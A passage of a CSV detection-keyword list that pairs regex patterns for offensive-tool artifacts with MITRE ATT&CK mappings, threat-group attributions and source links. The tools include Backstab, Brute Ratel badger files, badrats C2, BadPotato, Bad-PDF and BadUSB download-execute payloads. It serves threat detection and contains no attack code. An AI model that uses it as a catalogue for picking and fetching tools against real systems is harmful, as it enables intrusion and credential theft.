T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*backstab.exe*",".{0,1000}backstab\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Backstab.sln*",".{0,1000}Backstab\.sln.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*backstab.x64.*",".{0,1000}backstab\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*backstab.x86.*",".{0,1000}backstab\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*Backstab/Driverloading*",".{0,1000}Backstab\/Driverloading.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Backstab-master*",".{0,1000}Backstab\-master.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*BackupOperatorToDA.cpp*",".{0,1000}BackupOperatorToDA\.cpp.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupOperatorToDA.exe*",".{0,1000}BackupOperatorToDA\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupOperatorToDA.sln*",".{0,1000}BackupOperatorToDA\.sln.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupOperatorToDA-master*",".{0,1000}BackupOperatorToDA\-master.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*BackupPrivSAM \\*",".{0,1000}BackupPrivSAM\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*backupprivsam.*",".{0,1000}backupprivsam\..{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*Bad password counts dont replicate between domain controllers. Only the PDC knows the real amount of those. Be sure to target the PDC so that accounts don't get locked out*",".{0,1000}Bad\spassword\scounts\sdont\sreplicate\sbetween\sdomain\scontrollers\.\sOnly\sthe\sPDC\sknows\sthe\sreal\samount\sof\sthose\.\sBe\ssure\sto\starget\sthe\sPDC\sso\sthat\saccounts\sdon\'t\sget\slocked\sout.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60*",".{0,1000}bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359*",".{0,1000}badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*badger_exports.h*",".{0,1000}badger_exports\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_no_acl_1030_objects.log*",".{0,1000}badger_no_acl_1030_objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*badger_svc.exe*",".{0,1000}badger_svc\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_template.ps1*",".{0,1000}badger_template\.ps1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64.exe*",".{0,1000}badger_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64_*.bin*",".{0,1000}badger_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64_aws.exe*",".{0,1000}badger_x64_aws\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badger_x64_stealth_rtl.txt*",".{0,1000}badger_x64_stealth_rtl\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*BadgerAtoi*",".{0,1000}BadgerAtoi.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerDispatch*",".{0,1000}BadgerDispatch.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerDispatchW*",".{0,1000}BadgerDispatchW.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerMemcpy*",".{0,1000}BadgerMemcpy.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerMemset*",".{0,1000}BadgerMemset.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerStrcmp*",".{0,1000}BadgerStrcmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerStrlen*",".{0,1000}BadgerStrlen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcscmp*",".{0,1000}BadgerWcscmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcslen*",".{0,1000}BadgerWcslen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Bad-Pdf*",".{0,1000}Bad\-Pdf.{0,1000}","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","1031","212","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" "*BadPotato.cs*",".{0,1000}BadPotato\.cs.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BadPotato.exe*",".{0,1000}BadPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*badpotato.exe*",".{0,1000}badpotato\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*badrat.smb.hta*",".{0,1000}badrat\.smb\.hta.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat.smb.js*",".{0,1000}badrat\.smb\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_cs.csproj*",".{0,1000}badrat_cs\.csproj.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_cs.exe *",".{0,1000}badrat_cs\.exe\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_cs.exe.config*",".{0,1000}badrat_cs\.exe\.config.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrat_server.py *",".{0,1000}badrat_server\.py\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*badrats-c2-initial-access-payloads.html*",".{0,1000}badrats\-c2\-initial\-access\-payloads\.html.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*badrats-master.zip*",".{0,1000}badrats\-master\.zip.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","10","1","N/A","N/A","N/A","N/A" "*BadUSB_AddAdmin.ino*",".{0,1000}BadUSB_AddAdmin\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_DownloadExecute.ino*",".{0,1000}BadUSB_DownloadExecute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_FacebookPost.ino*",".{0,1000}BadUSB_FacebookPost\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" 